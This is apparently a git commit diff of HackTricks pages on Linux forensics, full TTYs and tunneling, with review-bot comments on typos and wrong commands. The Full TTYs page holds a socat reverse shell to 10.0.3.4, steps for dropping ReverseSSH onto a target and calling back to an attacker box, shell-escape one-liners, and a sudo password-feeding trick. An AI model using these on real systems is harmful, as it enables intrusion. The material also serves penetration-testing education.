GitBook: [#3195] No subject

This commit is contained in:
CPol 2022-05-08 23:13:03 +00:00 committed by gitbook-bot
parent ae9261cbcf
commit b8b4c413da
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
23 changed files with 519 additions and 281 deletions


View file

@ -60,12 +60,21 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (13).png>) ![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (13).png>)
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform** **Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
**Bug bounty tip**:**sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
### [SecurityBoat](https://securityboat.in)
![](<.gitbook/assets/SB logo black\_034525.png>)
**Securityboat** is a cybersecurity company focused on providing top of the line **penetration testing services** and the most comprehensive **automated security testing** solutions based on an extensive **manual security testing methodology** that utilizes various case-specific and **industry-tested** solutions. They are committed to providing clear communication on cybersecurity issues, developing solutions, and prioritizing **business risk**.\
**Make the right choice by contacting us for your security:**
{% embed url="https://securityboat.in/contact-us" %}
### [**INE**](https://ine.com) ### [**INE**](https://ine.com)
![](<.gitbook/assets/INE\_Logo (3).jpg>) ![](<.gitbook/assets/INE\_Logo (3).jpg>)
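Review bot: the new sponsor entry does not follow the heading style of its neighbours: `### [SecurityBoat](https://securityboat.in)` uses a plain link while the adjacent `### [**INE**](https://ine.com)` bolds the name, and the body then spells it `**Securityboat**` against `SecurityBoat` in the heading. Pick one spelling and the bold-link form. The image path `SB logo black\_034525.png` also escapes the underscore, which GitBook tolerates but which differs from the `SB logo black_034525.png` form used in the `<img src>` tags this same commit adds to the other pages.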

View file

@ -1,4 +1,4 @@
# Linux Forensics
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Initial Information Gathering {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Initial Information Gathering
### Basic Information
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries: First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
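Review bot: the `{% hint %}` sponsor block added here is inserted verbatim again at the bottom of this page and at the top and bottom of the other two pages in this commit; if the banner is meant to be site-wide, a single include or layout element would keep it out of each page body and avoid the copies drifting apart. Since this hunk already re-touches the paragraph below, the context line still reads `mount the USN` where `mount the USB` is meant.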
@ -48,7 +54,7 @@ cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
``` ```
### Suspicious information #### Suspicious information
While obtaining the basic information you should check for weird things like: While obtaining the basic information you should check for weird things like:
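Review bot: the comment on the context line `find /directory -type f -mtime -1 -print #Find modified files during the last minute` is wrong: `-mtime -1` matches files modified within the last 24 hours; `-mmin -1` is the minute-granularity form. Worth correcting while this hunk re-touches the block's closing fence.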
@ -56,7 +62,7 @@ While obtaining the basic information you should check for weird things like:
* Check **registered logins** of users without a shell inside `/etc/passwd` * Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell * Check for **password hashes** inside `/etc/shadow` for users without a shell
## Memory Dump ### Memory Dump
In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
In order to **compile** it you need to use the **exact same kernel** the victim machine is using. In order to **compile** it you need to use the **exact same kernel** the victim machine is using.
@ -81,14 +87,14 @@ LiME supports 3 **formats**:
LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
## Disk Imaging ### Disk Imaging
### Shutting down #### Shutting down
First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\ First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
### Taking an image of the disk #### Taking an image of the disk
It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information. It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information.
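Review bot: two slips in the shutdown paragraph that this hunk carries as context: `"plug the plug" shutdown` should read `"pull the plug"` (the sentence later uses the correct form), and `but I will also allow the possible malware` should be `but it will also allow`. The advice to `sync` and pull the plug is only safe in the order the page implies, memory image first, then `sync`, then power off; stating that ordering explicitly would make the step harder to get wrong.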
@ -101,7 +107,7 @@ dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<c
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
``` ```
## Disk Image pre-analysis ### Disk Image pre-analysis
Imaging that you receive a disk image with no more data. Imaging that you receive a disk image with no more data.
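Review bot: `Imaging that you receive a disk image with no more data.` should be `Imagine that you receive ...`; the demoted heading right above it is the only change in this hunk, so the typo is easy to pick up here.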
@ -158,9 +164,9 @@ icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret ThisisTheMasterSecret
``` ```
# Search for known Malware ## Search for known Malware
## Modified System Files ### Modified System Files
Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager. Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager.
@ -172,7 +178,7 @@ dpkg --verify
debsums | grep -v "OK$" #apt-get install debsums debsums | grep -v "OK$" #apt-get install debsums
``` ```
## Malware/Rootkit Detectors ### Malware/Rootkit Detectors
Read the following page to learn about tools that can be useful to find malware: Read the following page to learn about tools that can be useful to find malware:
@ -180,9 +186,9 @@ Read the following page to learn about tools that can be useful to find malware:
[malware-analysis.md](malware-analysis.md) [malware-analysis.md](malware-analysis.md)
{% endcontent-ref %} {% endcontent-ref %}
# Search installed programs ## Search installed programs
## Package Manager ### Package Manager
On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\ On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\
On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems. On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems.
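Review bot: both paths in the context paragraph contain stray spaces that break copy-paste: `/var/ lib/dpkg/status` should be `/var/lib/dpkg/status`, and `rpm -qa --root=/ mntpath/var/lib/rpm` should have no space after `--root=`. See the note on the following code block for the `--root` argument itself.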
@ -195,7 +201,7 @@ cat /var/log/dpkg.log | grep installed
rpm -qa --root=/ mntpath/var/lib/rpm rpm -qa --root=/ mntpath/var/lib/rpm
``` ```
## Other ### Other
**Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code. **Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code.
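Review bot: the command `rpm -qa --root=/ mntpath/var/lib/rpm` in the code block is wrong even after removing the space. `--root` names the top of the mounted filesystem tree and rpm appends its default database path to it, so `rpm -qa --root=/mntpath` is the form that reads `/mntpath/var/lib/rpm`; pointing `--root` at the database directory itself makes rpm look for `/mntpath/var/lib/rpm/var/lib/rpm`. To address the database directly, `--dbpath=/mntpath/var/lib/rpm` is the option to use.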
@ -213,13 +219,13 @@ find /sbin/ -exec dpkg -S {} \; | grep "no path found"
find /sbin/ exec rpm -qf {} \; | grep "is not" find /sbin/ exec rpm -qf {} \; | grep "is not"
``` ```
# Recover Deleted Running Binaries ## Recover Deleted Running Binaries
![](<../../.gitbook/assets/image (641).png>) ![](<../../.gitbook/assets/image (641).png>)
# Inspect AutoStart locations ## Inspect AutoStart locations
## Scheduled Tasks ### Scheduled Tasks
```bash ```bash
cat /var/spool/cron/crontabs/* \ cat /var/spool/cron/crontabs/* \
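Review bot: the context line `find /sbin/ exec rpm -qf {} \; | grep "is not"` is missing the dash on `-exec`; as written, `find` treats `exec` as a second start path and fails. The `dpkg -S` line directly above it has the correct `-exec` form.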
@ -235,7 +241,7 @@ cat /var/spool/cron/crontabs/* \
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
``` ```
## Services ### Services
It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries. It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries.
@ -248,11 +254,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser
* _**/etc/systemd/system**_ * _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_ * _**/etc/systemd/system/multi-user.target.wants/**_
## Kernel Modules ### Kernel Modules
On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware. On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware.
## Other AutoStart Locations ### Other AutoStart Locations
There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware. There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware.
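Review bot: in the kernel-modules paragraph the path `/lib/modules/'uname -r'` uses single quotes where command substitution is meant (`/lib/modules/$(uname -r)`), and `/etc/modprobe` is not a standard file; `/etc/modprobe.d/` and the legacy `/etc/modprobe.conf` are. The boot-time autoload lists, `/etc/modules` on Debian-derived systems and `/etc/modules-load.d/*.conf` on systemd systems, are the places an unauthorized module is most likely to be registered and are missing from the list entirely.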
@ -260,11 +266,11 @@ There are several configuration files that Linux uses to automatically launch an
* _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ are executed when the specific user logs in. * _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ are executed when the specific user logs in.
* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel. * _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
# Examine Logs ## Examine Logs
Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service. Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service.
## Pure Logs ### Pure Logs
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\ **Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
Interesting system logons: Interesting system logons:
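Review bot: in the autostart bullet the entries `/.bashrc`, `/.bash_profile` and `/.config/autostart` have lost the home-directory prefix that `\~/.profile` on the same line keeps; they should all be written `\~/...` (the tilde is escaped elsewhere in this file), otherwise the paths point at the filesystem root.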
@ -291,7 +297,7 @@ Interesting system logons:
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
{% endhint %} {% endhint %}
## Command History ### Command History
Many Linux systems are configured to maintain a command history for each user account: Many Linux systems are configured to maintain a command history for each user account:
@ -300,7 +306,7 @@ Many Linux systems are configured to maintain a command history for each user ac
* \~/.sh\_history * \~/.sh\_history
* \~/.\*\_history * \~/.\*\_history
## Logins ### Logins
Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\ Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\
It's recommended to check if those logins make sense: It's recommended to check if those logins make sense:
@ -312,7 +318,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/
Note that you can also **take a look to this information reading the logs**. Note that you can also **take a look to this information reading the logs**.
## Application Traces ### Application Traces
* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**/.ssh/authorized\_keys**_ and _**/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts. * **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**/.ssh/authorized\_keys**_ and _**/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts.
* **Gnome Desktop**: User accounts may have a _**/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop. * **Gnome Desktop**: User accounts may have a _**/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop.
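Review bot: the SSH bullet names `/.ssh/known_keys`, which does not exist; the file that records remote hosts is `~/.ssh/known_hosts`. The sentence also claims that SSH connections result in entries in `authorized_keys`; that file lists keys permitted to log in and is not written by connections, so the evidence it gives is which public keys were planted, not which hosts were contacted. Separating those two points would make the bullet accurate.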
@ -321,20 +327,20 @@ Note that you can also **take a look to this information reading the logs**.
* **MySQL**: User accounts may have a _**/.mysql\_history**_ file that contains queries executed using MySQL. * **MySQL**: User accounts may have a _**/.mysql\_history**_ file that contains queries executed using MySQL.
* **Less**: User accounts may have a _**/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less * **Less**: User accounts may have a _**/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less
## USB Logs ### USB Logs
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. [**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list). It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list).
## Installation ### Installation
``` ```
pip3 install usbrip pip3 install usbrip
usbrip ids download #Downloal USB ID database usbrip ids download #Downloal USB ID database
``` ```
## Examples ### Examples
``` ```
usbrip events history #Get USB history of your curent linux machine usbrip events history #Get USB history of your curent linux machine
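Review bot: `Installation` and `Examples` are sub-parts of `USB Logs`, but this hunk demotes all three to `###`, so they now read as siblings of USB Logs rather than children; `####` for the two inner headings keeps the nesting the page had. Two typos in the context comments while here: `Downloal` and `curent`.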
@ -346,13 +352,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
# Review User Accounts and Logon Activities ## Review User Accounts and Logon Activities
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\ Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
Finally look for accounts with **no passwords** or **easily guessed** passwords. Finally look for accounts with **no passwords** or **easily guessed** passwords.
# Examine File System ## Examine File System
File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\ File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\
**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\ **Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
@ -375,27 +381,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
{% endhint %} {% endhint %}
# Compare files of different filesystem versions ## Compare files of different filesystem versions
### Find added files #### Find added files
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
``` ```
### Find Modified content #### Find Modified content
```bash ```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
``` ```
### Find deleted files #### Find deleted files
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
``` ```
### Other filters #### Other filters
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** **`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`**
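Review bot: the `Find deleted files` block runs `git diff --no-index --diff-filter=A ...`, which is identical to the `Find added files` command two blocks up; deleted entries need `--diff-filter=D`. The option summary that follows is also written with a single dash, `-diff-filter=`, where git's option is `--diff-filter=`.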
@ -405,11 +411,17 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil
Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled. Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled.
# References ## References
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -426,5 +438,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Full TTYs
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Full TTY {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Full TTY
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
@ -39,7 +45,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
``` ```
## **Spawn shells** ### **Spawn shells**
* `python -c 'import pty; pty.spawn("/bin/sh")'` * `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')` * `echo os.system('/bin/bash')`
@ -54,7 +60,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
* vi: `:set shell=/bin/bash:shell` * vi: `:set shell=/bin/bash:shell`
* nmap: `!sh` * nmap: `!sh`
# ReverseSSH ## ReverseSSH
A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target. A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.
@ -69,7 +75,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
/dev/shm/reverse-ssh -v -l -p 4444 /dev/shm/reverse-ssh -v -l -p 4444
``` ```
* \(2a\) Linux target: * (2a) Linux target:
```bash ```bash
# Drop it via your preferred way, e.g. # Drop it via your preferred way, e.g.
@ -78,7 +84,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
``` ```
* \(2b\) Windows 10 target \(for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)\): * (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
```bash ```bash
# Drop it via your preferred way, e.g. # Drop it via your preferred way, e.g.
@ -97,7 +103,7 @@ ssh -p 8888 127.0.0.1
sftp -P 8888 127.0.0.1 sftp -P 8888 127.0.0.1
``` ```
# No TTY ## No TTY
If for some reason you cannot obtain a full TTY you **still can interact with programs** that expects user input. In the following example, the password is passed to `sudo` to read a file: If for some reason you cannot obtain a full TTY you **still can interact with programs** that expects user input. In the following example, the password is passed to `sudo` to read a file:
@ -105,7 +111,12 @@ If for some reason you cannot obtain a full TTY you **still can interact with pr
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact' expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
``` ```
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
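Review bot: the sponsor block added here (`{% hint style="danger" %}` … `{% endhint %}`) is pasted verbatim at the top and bottom of every page in this commit, with only the `../` depth of the logo path differing; a single shared snippet would keep the image path and copy from drifting across pages. Since this hunk already reworks the surrounding text, the unchanged context line "programs that expects user input" should also become "programs that expect user input".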
@ -122,5 +133,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -1,4 +1,4 @@
# Tunneling and Port Forwarding
<details> <details>
@ -16,18 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# **SSH** {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
SSH graphical connection \(X\) ## **SSH**
SSH graphical connection (X)
```bash ```bash
ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X
``` ```
## Local Port2Port ### Local Port2Port
Open new Port in SSH Server --&gt; Other port Open new Port in SSH Server --> Other port
```bash ```bash
ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere
